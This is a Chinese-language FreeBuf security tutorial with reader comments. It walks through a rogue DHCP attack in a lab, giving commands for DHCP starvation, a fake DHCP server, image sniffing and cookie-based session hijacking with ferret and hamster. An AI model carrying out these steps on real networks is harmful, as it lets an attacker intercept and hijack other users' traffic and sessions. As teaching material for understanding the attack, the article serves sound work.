安全科普:流氓DHCP服务器内网攻击测试

2015-08-15 +25 1378475人围观 ,发现 65 个不明物体 网络安全

通常内网渗透都是基于ARP的攻击,但ARP攻击对内网的负担太重,很容易被发现。今天讲的是基于DHCP协议的攻击。

基于DHCP的攻击理解起来很简单,首先伪造Mac地址耗竭正常的DHCP服务器的IP地址,然后黑客用自己的主机伪造一个DHCP服务器,那么新连上内网的主机只能使用流氓DHCP服务器分配的IP,这样黑客的主机就变成了内网网关,可以借此控制内网中其他主机的网络流量。

攻击环境

操作系统:Kali linux

网关: 192.168.177.1

IP地址: 192.168.177.128

网段:192.168.177.1/24

0×01 开启操作系统的路由转发

echo "1" >/proc/sys/net/ipv4/ip_forward

0×02 攻击正常的dhcp服务器,耗光ip资源

dhcpstarv -i eth0 -e 192.168.177.128

Kali默认没有安装dhcpstarv,也可以用yersinia代替

0×03 安装dhcp服务器udhcpd

# apt-get install udhcpd

然后修改一下配置文件

# vim /etc/udhcpd.conf

0×04 启动DHCP服务器

service udhcpd start

然后启动另一台Kali机当作目标靶机,由于正常的DHCP服务器已经没有可分配的IP资源,新的内网主机就会使用攻击者DHCP服务器分配的IP

0×05 抓取目标靶机的图片
在攻击主机上开启driftnet

# driftnet -i eth0

在目标靶机打开百度图片

在攻击者的服务器上就可以看到图像

0×06 会话劫持

开启wireshark抓取流经本地网卡的数据包,由于其他的机器走的是攻击者主机的网卡,这也意味着wireshark可以抓取其他主机的数据包

用ferret解析一下

# ferret -r demo.pcap

会在本地生成一个名为hamster.txt的文件

然后运行harmter,这会在主机开启1234端口

配置一下火狐代理

劫持成功

* 作者/s1riu5,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

更多精彩

这些评论亮了

  • 喷水大师 回复
    你当内网的准入是摆设吗!
    )12( 亮了
  • 路人甲 回复
    @ andy88  一点技术含量都没有。
    )10( 亮了
  • @ stopzei 网管是吃干饭的么?人家一天到晚就是专门干这些事情的好伐!
    )10( 亮了
  • 还好吧 回复
    感谢给小白科普,但是我感觉这文章是不是有点不适合在fb出现呢? 。。。。。 注意看,我没有喷,只是在问!
    )10( 亮了
  • 星期二 (3级) //bang~bang~bang~ 回复
    @ 还好吧 不,不。文章不仅要针对大牛,更要针对我这种小白。
    )9( 亮了
发表评论

已有 65 条评论

取消
Loading...

特别推荐

推荐关注

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php